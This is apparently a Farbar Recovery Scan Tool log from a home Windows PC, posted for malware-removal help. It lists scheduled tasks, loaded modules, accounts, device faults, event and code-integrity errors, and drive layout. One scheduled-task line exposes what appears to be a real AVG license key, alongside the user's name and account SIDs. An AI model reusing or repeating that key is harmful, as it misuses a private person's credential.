Task: {08CF2507-F4AC-4D6B-A548-525A8B11A3AC} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe
Task: {0B1486F2-ABB1-44FF-ABBE-B8F650DDA37D} - System32\Tasks\Microsoft_Hardware_Launch_itype_exe => c:\Program Files\Microsoft Device Center\itype.exe [2012-06-26] (Microsoft Corporation)
Task: {0CCCD7A3-1ACC-4AE1-8AD4-ADFCD53F2843} - System32\Tasks\Microsoft_Hardware_Launch_devicecenter_exe => c:\Program Files\Microsoft Device Center\devicecenter.exe [2012-06-26] (Microsoft)
Task: {0E3ACCDE-D1CA-4DC4-848D-F9420E26BCD8} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-10-22] (Google Inc.)
Task: {1860CE0D-121E-47BE-BCB1-4BBABB9D34F8} - System32\Tasks\{A63C80F9-5D8B-4B47-AB88-BA152EF04702} => C:\Users\Chris\Desktop\AFU236U.exe
Task: {1B8EFB11-098E-4762-8E04-6652B37DCA07} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesCommonx86\Microsoft Shared\OFFICE15\OLicenseHeartbeat.exe [2014-11-14] (Microsoft Corporation)
Task: {24322407-DCDB-4B42-B398-22B4971C15EE} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2014-10-07] (Microsoft Corporation)
Task: {2CA0166D-FB83-41F4-99D2-A6920599317C} - System32\Tasks\{F7D7DD1A-B878-45D4-86BB-01DBF4F346E5} => D:\MS Office 2007 Pro Plus & Expression Web.exe
Task: {31F9F848-C01A-4BF6-AA06-0C523AC7E02A} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe
Task: {368E04F2-1EC0-4EDF-82F1-0D4E4DBB037F} - System32\Tasks\MotoCast Update => C:\Program Files (x86)\Motorola Mobility\MotoCast\LiveUpdate\MotoCastUpdate.exe
Task: {3AFC7EEA-F208-4D49-8017-0BD689CDAB23} - System32\Tasks\{78F6FE58-338E-492F-9500-57D5630A45AD} => C:\Users\Chris\Desktop\AFU236U.exe
Task: {4C6D6891-2B84-4BB7-AB9A-C1DA52ED4798} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2013-04-23] (Piriform Ltd)
Task: {5B1DFF8C-6D2D-4039-9DE9-4048F05E053A} - System32\Tasks\{9E86D9FE-32C3-4EFF-AAE1-885FA17CCBCE} => D:\Setup.exe
Task: {6A89EA2B-DD80-4DD9-81FD-17B988D73F13} - System32\Tasks\OfficeSoftwareProtectionPlatform\SvcRestartTask => Sc.exe start osppsvc
Task: {8E8753CB-55D0-42AA-8115-512B90D4FFD5} - System32\Tasks\{8F71403E-A311-41B7-88A3-42CE41DC66E2} => pcalua.exe -a "C:\Program Files (x86)\AVG\AVG10\avgmfapx.exe" -d C:\Windows\SysWOW64 -c /AppMode=DOWNLOADMANAGER /VersionUpgrade /OldLicenseKey=4UVK2-ALYMF-SLKLU-AZ2UB-6GOKB-J
Task: {B2003092-516A-477B-9771-39C44F1E3096} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-12-09] (Adobe Systems Incorporated)
Task: {BA84B4AD-44D2-46F3-93F3-060582E92DB5} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office 15\root\Office15\msoia.exe [2014-11-14] (Microsoft Corporation)
Task: {C2C43002-056D-4FDF-BF2B-5260918CE0DF} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDImmunize.exe
Task: {C6964F5C-53B3-48C7-BECD-6EA75136E921} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office 15\root\Office15\msoia.exe [2014-11-14] (Microsoft Corporation)
Task: {C86B66DD-1DBD-4274-B2C4-BE55973798D1} - System32\Tasks\{35D5BF89-213A-4ECE-8AF6-F1150F9EF7A3} => C:\Program Files (x86)\Skype\Phone\Skype.exe [2014-10-01] (Skype Technologies S.A.)
Task: {CC1B1CF8-8760-4610-A5FE-691301D337D9} - System32\Tasks\Launch ASUS Sync Loader => C:\Program Files (x86)\ASUS\ASUS Sync\asusUPCTLoader.exe [2013-03-01] (Futuredial Inc.)
Task: {CE9D5746-CFDD-4EDE-8B83-A147E99AE44D} - System32\Tasks\Microsoft_Hardware_Launch_ipoint_exe => c:\Program Files\Microsoft Device Center\ipoint.exe [2012-06-26] (Microsoft Corporation)
Task: {D94EBB44-FEB1-494C-910B-BEDA5FA32B66} - System32\Tasks\Microsoft Office 15 Sync Maintenance for Desktop-Chris Desktop => C:\Program Files\Microsoft Office 15\Root\Office15\MsoSync.exe [2014-11-14] (Microsoft Corporation)
Task: {DC505F15-F396-4722-B7D2-88E691506ECB} - System32\Tasks\{EA3FB5D0-37B9-4784-B74D-763E4F35FBFE} => C:\Users\Chris\Desktop\Vista\AsusSetup.exe
Task: {E9A48A78-835E-4BBF-A2C0-79931709DF8E} - System32\Tasks\{D01E15C5-FD40-4A57-83C7-B1B37AC81274} => pcalua.exe -a C:\Users\Chris\Desktop\Vista\Setup.exe -d C:\Users\Chris\Desktop\Vista
Task: {EF8E15FC-6678-4C21-9861-13DCF76C53AA} - System32\Tasks\SamsungMagician => C:\Program Files (x86)\Samsung SSD Magician\Samsung Magician.exe [2014-09-28] (Samsung Electronics.)
Task: {F05BC4E9-5FA3-4C96-B27E-5CB75E0F428D} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-10-22] (Google Inc.)
Task: {F9458954-4640-4094-A7B1-66A97ED1A46E} - System32\Tasks\{809C9427-4534-43E2-B052-DD12B224511E} => C:\Program Files (x86)\Skype\Phone\Skype.exe [2014-10-01] (Skype Technologies S.A.)
Task: {FF3A93E1-FB1D-44A9-88F4-D96018B3C028} - System32\Tasks\{BA922071-AA89-464C-B277-C57A12AACA2F} => C:\Users\Chris\Desktop\AFU236U.exe
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\ROC_REG_JAN_DELETE.job => C:\ProgramData\AVG January 2013 Campaign\ROC.exe
==================== Loaded Modules (whitelisted) =============
2011-11-19 11:20 - 2014-07-02 13:55 - 00116568 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2014-11-14 07:30 - 2014-05-20 09:19 - 00105640 _____ () C:\Program Files\Microsoft Office 15\ClientX64\ApiClient.dll
2009-12-15 22:19 - 2009-05-12 21:00 - 00102400 _____ () C:\Program Files (x86)\Clarus\Samsung SecretZone\MSSvc.exe
2014-12-09 17:31 - 2014-12-09 17:31 - 00159768 _____ () C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.2.0\loggingserver.exe
2014-11-14 07:36 - 2014-11-14 07:36 - 08897696 _____ () C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\1033\GrooveIntlResource.dll
2009-12-12 12:07 - 2009-08-16 17:06 - 00166400 _____ () C:\Program Files\WinRAR\rarext.dll
2009-10-14 12:36 - 2009-10-14 12:36 - 02793304 _____ () C:\Program Files\Logitech\Logitech WebCam Software\LWS.exe
2009-10-14 12:34 - 2009-10-14 12:34 - 00560472 _____ () C:\Program Files (x86)\Common Files\Logishrd\LQCVFX\COCIManager.exe
2013-08-30 17:11 - 2013-08-30 17:11 - 00063376 _____ () C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\zlib1.dll
2014-08-30 17:12 - 2014-08-30 17:12 - 01269952 _____ () C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 15.0.1\kpcengine.2.3.dll
2010-03-23 12:26 - 2010-03-23 12:26 - 00201512 _____ () C:\Program Files (x86)\Cisco Systems\VPN Client\vpnapi.dll
2009-12-15 22:19 - 2009-05-12 21:00 - 00282624 _____ () C:\Program Files (x86)\Clarus\Samsung SecretZone\MSMgrSDK.dll
2009-12-15 22:19 - 2009-05-11 20:39 - 00106496 _____ () C:\Program Files (x86)\Clarus\Samsung SecretZone\MSUtilSdk.dll
2009-12-15 22:19 - 2009-05-11 20:39 - 00528384 _____ () C:\Program Files (x86)\Clarus\Samsung SecretZone\MSMgrSDK.EN
2014-12-13 07:16 - 2014-05-13 12:04 - 00109400 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlThirdParty150.bpl
2014-12-13 07:16 - 2014-05-13 12:04 - 00416600 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\DEC150.bpl
2014-12-13 07:16 - 2014-05-13 12:04 - 00167768 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlFileFormats150.bpl
2014-12-09 17:31 - 2014-12-09 17:31 - 00519704 _____ () C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.2.0\log4cplusU.dll
2014-09-24 18:42 - 2014-09-24 18:42 - 00081056 _____ () C:\Users\Chris\AppData\Local\Microsoft\SkyDrive\17.3.1229.0918\LoggingPlatform.dll
2014-02-02 08:28 - 2014-09-28 17:59 - 00019872 _____ () C:\Program Files (x86)\Samsung SSD Magician\SAMSUNG_SSD.dll
2014-11-14 07:32 - 2014-11-14 07:36 - 00316576 _____ () C:\Program Files\Microsoft Office 15\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\OFFICE15\AppVIsvStream32.dll
2014-09-24 18:42 - 2014-09-24 18:42 - 00081056 _____ () C:\Users\Chris\AppData\Local\Microsoft\SkyDrive\17.3.1229.0918\LoggingPlatform.DLL
2014-11-14 07:32 - 2014-11-14 07:36 - 08897696 _____ () C:\Program Files\Microsoft Office 15\root\Office15\1033\GrooveIntlResource.dll
2014-12-13 08:38 - 2014-12-05 20:50 - 01077064 _____ () C:\Program Files (x86)\Google\Chrome\Application\39.0.2171.95\libglesv2.dll
2014-12-13 08:38 - 2014-12-05 20:50 - 00211272 _____ () C:\Program Files (x86)\Google\Chrome\Application\39.0.2171.95\libegl.dll
2014-12-13 08:38 - 2014-12-05 20:50 - 09009480 _____ () C:\Program Files (x86)\Google\Chrome\Application\39.0.2171.95\pdf.dll
2014-12-13 08:38 - 2014-12-05 20:50 - 01677128 _____ () C:\Program Files (x86)\Google\Chrome\Application\39.0.2171.95\ffmpegsumo.dll
2012-12-12 14:31 - 2012-12-12 14:31 - 00012336 _____ () C:\Program Files (x86)\Citrix\SelfServicePlugin\ExtensionSDK.dll
2013-03-01 10:55 - 2013-03-01 10:55 - 00516599 _____ () C:\Program Files (x86)\ASUS\ASUS Sync\sqlite3.dll
2013-03-01 10:55 - 2013-03-01 10:55 - 00094208 _____ () C:\Program Files (x86)\ASUS\ASUS Sync\fdHttpd.dll
2013-03-01 10:55 - 2013-03-01 10:55 - 00356352 _____ () C:\Program Files (x86)\ASUS\ASUS Sync\asusDetect.dll
2013-03-01 10:55 - 2013-03-01 10:55 - 00147456 _____ () C:\Program Files (x86)\ASUS\ASUS Sync\asusDetectLegend.dll
2013-03-01 10:55 - 2013-03-01 10:55 - 00559244 _____ () C:\Program Files (x86)\ASUS\ASUS Sync\sqlite3.7.dll
2013-03-01 10:55 - 2013-03-01 10:55 - 00139264 _____ () C:\Program Files (x86)\ASUS\ASUS Sync\asusDisk.dll
==================== Alternate Data Streams (whitelisted) =========
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
AlternateDataStreams: C:\ProgramData\TEMP:0B4227B4
==================== Safe Mode (whitelisted) ===================
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
==================== EXE Association (whitelisted) =============
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
==================== MSCONFIG/TASK MANAGER disabled items =========
(Currently there is no automatic fix for this section.)
MSCONFIG\Services: DeviceMonitorService => 2
MSCONFIG\Services: IntuitUpdateService => 2
MSCONFIG\Services: Media Center 18 Service => 3
MSCONFIG\Services: Motorola Device Manager => 2
MSCONFIG\Services: PST Service => 2
MSCONFIG\Services: ZDManager Service => 2
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^McAfee Security Scan Plus.lnk => C:\Windows\pss\McAfee Security Scan Plus.lnk.CommonStartup
MSCONFIG\startupreg: (default) =>
MSCONFIG\startupreg: CitrixReceiver => "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Citrix\Receiver Updater.lnk"
MSCONFIG\startupreg: ConnectionCenter => "C:\Users\Chris\AppData\Local\Citrix\ICA Client\concentr.exe" /startup
MSCONFIG\startupreg: vProt => "C:\Program Files (x86)\AVG SafeGuard toolbar\vprot.exe"
========================= Accounts: ==========================
Administrator (S-1-5-21-2526012750-3186116482-2568347101-500 - Administrator - Disabled)
Chris (S-1-5-21-2526012750-3186116482-2568347101-1001 - Administrator - Enabled) => C:\Users\Chris
Guest (S-1-5-21-2526012750-3186116482-2568347101-501 - Limited - Enabled)
HomeGroupUser$ (S-1-5-21-2526012750-3186116482-2568347101-1004 - Limited - Enabled)
Kids (S-1-5-21-2526012750-3186116482-2568347101-1005 - Limited - Enabled) => C:\Users\Kids
UpdatusUser (S-1-5-21-2526012750-3186116482-2568347101-1003 - Limited - Enabled) => C:\Users\UpdatusUser
==================== Faulty Device Manager Devices =============
Name: ATA Channel 0
Description: IDE Channel
Class Guid: {4d36e96a-e325-11ce-bfc1-08002be10318}
Manufacturer: (Standard IDE ATA/ATAPI controllers)
Service: atapi
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.
Name: ATA Channel 1
Description: IDE Channel
Class Guid: {4d36e96a-e325-11ce-bfc1-08002be10318}
Manufacturer: (Standard IDE ATA/ATAPI controllers)
Service: atapi
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.
Name: Cisco AnyConnect Secure Mobility Client Virtual Miniport Adapter for Windows x64
Description: Cisco AnyConnect Secure Mobility Client Virtual Miniport Adapter for Windows x64
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Cisco Systems
Service: vpnva
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
Name: Cisco Systems VPN Adapter for 64-bit Windows
Description: Cisco Systems VPN Adapter for 64-bit Windows
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Cisco Systems
Service: CVirtA
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
Name: Standard PS/2 Keyboard
Description: Standard PS/2 Keyboard
Class Guid: {4d36e96b-e325-11ce-bfc1-08002be10318}
Manufacturer: (Standard keyboards)
Service: i8042prt
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.
==================== Event log errors: =========================
Application errors:
==================
Error: (12/16/2014 05:51:44 AM) (Source: Family Safety Service) (EventID: 0) (User: )
Description: Startup failure. Step: FamilySafetyServiceFactory initialization. Error code: 80070002
Error: (12/16/2014 05:51:43 AM) (Source: Family Safety Service) (EventID: 0) (User: )
Description: Startup failure: Open driver handle. Error code: FF2E14
Error: (12/16/2014 05:51:15 AM) (Source: Family Safety Service) (EventID: 0) (User: )
Description: Startup failure. Step: FamilySafetyServiceFactory initialization. Error code: 80070002
Error: (12/16/2014 05:51:14 AM) (Source: Family Safety Service) (EventID: 0) (User: )
Description: Startup failure: Open driver handle. Error code: FF2E14
Error: (12/15/2014 07:50:41 PM) (Source: Family Safety Service) (EventID: 0) (User: )
Description: Startup failure. Step: FamilySafetyServiceFactory initialization. Error code: 80070002
Error: (12/15/2014 07:50:41 PM) (Source: Family Safety Service) (EventID: 0) (User: )
Description: Startup failure: Open driver handle. Error code: 92E14
Error: (12/15/2014 06:57:30 PM) (Source: Family Safety Service) (EventID: 0) (User: )
Description: Startup failure. Step: FamilySafetyServiceFactory initialization. Error code: 80070002
Error: (12/15/2014 06:57:29 PM) (Source: Family Safety Service) (EventID: 0) (User: )
Description: Startup failure: Open driver handle. Error code: 362E14
Error: (12/15/2014 06:57:00 PM) (Source: Family Safety Service) (EventID: 0) (User: )
Description: Startup failure. Step: FamilySafetyServiceFactory initialization. Error code: 80070002
Error: (12/15/2014 06:56:59 PM) (Source: Family Safety Service) (EventID: 0) (User: )
Description: Startup failure: Open driver handle. Error code: DF2E14
System errors:
=============
Error: (12/16/2014 05:51:44 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The Windows Live Family Safety Service service terminated with the following error:
%%-2147024894
Error: (12/16/2014 05:51:18 AM) (Source: Disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk2\DR2.
Error: (12/16/2014 05:51:15 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The Windows Live Family Safety Service service terminated with the following error:
%%-2147024894
Error: (12/15/2014 07:50:41 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The Windows Live Family Safety Service service terminated with the following error:
%%-2147024894
Error: (12/15/2014 06:57:30 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The Windows Live Family Safety Service service terminated with the following error:
%%-2147024894
Error: (12/15/2014 06:57:00 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The Windows Live Family Safety Service service terminated with the following error:
%%-2147024894
Error: (12/15/2014 06:56:30 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The Windows Live Family Safety Service service terminated with the following error:
%%-2147024894
Error: (12/15/2014 06:56:00 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The Windows Live Family Safety Service service terminated with the following error:
%%-2147024894
Error: (12/15/2014 06:55:30 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The Windows Live Family Safety Service service terminated with the following error:
%%-2147024894
Error: (12/15/2014 06:55:29 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {9A027D9F-AE6D-4116-AE94-BAB878D7EE47}
Microsoft Office Sessions:
=========================
Error: (05/11/2014 04:38:20 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6695.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 2 seconds with 0 seconds of active time. This session ended with a crash.
Error: (05/27/2011 04:39:11 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.6557.5001, Microsoft Office Version: 12.0.6425.1000. This session lasted 25 seconds with 0 seconds of active time. This session ended with a crash.
Error: (10/17/2010 06:56:37 AM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.6539.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 7 seconds with 0 seconds of active time. This session ended with a crash.
Error: (12/12/2009 10:05:53 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.6423.1000, Microsoft Office Version: 12.0.6425.1000. This session lasted 105 seconds with 60 seconds of active time. This session ended with a crash.
CodeIntegrity Errors:
===================================
Date: 2014-12-15 16:49:36.305
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\Program Files (x86)\Clarus\Samsung SecretZone\mvd20.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2014-12-15 16:49:36.227
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\Program Files (x86)\Clarus\Samsung SecretZone\mvd20.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2014-12-15 16:49:35.946
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\Program Files (x86)\Clarus\Samsung SecretZone\mvd20.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2014-12-15 16:49:35.868
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\Program Files (x86)\Clarus\Samsung SecretZone\mvd20.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2014-12-15 16:49:35.478
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\Program Files (x86)\Clarus\Samsung SecretZone\mvd20.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2014-12-15 16:49:35.400
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\Program Files (x86)\Clarus\Samsung SecretZone\mvd20.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2014-12-15 16:49:08.443
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\Program Files (x86)\Clarus\Samsung SecretZone\mvd20.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2014-12-15 16:49:08.350
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\Program Files (x86)\Clarus\Samsung SecretZone\mvd20.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2014-12-15 15:09:41.179
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\Program Files (x86)\Clarus\Samsung SecretZone\mvd20.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2014-12-15 15:09:41.101
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\Program Files (x86)\Clarus\Samsung SecretZone\mvd20.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
==================== Memory info ===========================
Processor: Intel® Core2 Duo CPU E6750 @ 2.66GHz
Percentage of memory in use: 41%
Total physical RAM: 4095.12 MB
Available physical RAM: 2392.18 MB
Total Pagefile: 8188.41 MB
Available Pagefile: 4945.19 MB
Total Virtual: 8192 MB
Available Virtual: 8191.83 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:119.24 GB) (Free:21.6 GB) NTFS ==>[Drive with boot components (obtained from BCD)]
Drive f: (Storage) (Fixed) (Total:465.76 GB) (Free:87.94 GB) NTFS
Drive g: (SAMSUNG) (Fixed) (Total:1396.92 GB) (Free:467.95 GB) FAT32
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 119.2 GB) (Disk ID: F1A51924)
Partition 1: (Active) - (Size=119.2 GB) - (Type=07 NTFS)
========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 00000001)
Partition 1: (Active) - (Size=465.8 GB) - (Type=07 NTFS)
========================================================
Disk: 2 (Size: 1397.3 GB) (Disk ID: 2F595C24)
Partition 1: (Not Active) - (Size=1397.3 GB) - (Type=0C)
==================== End Of Log ============================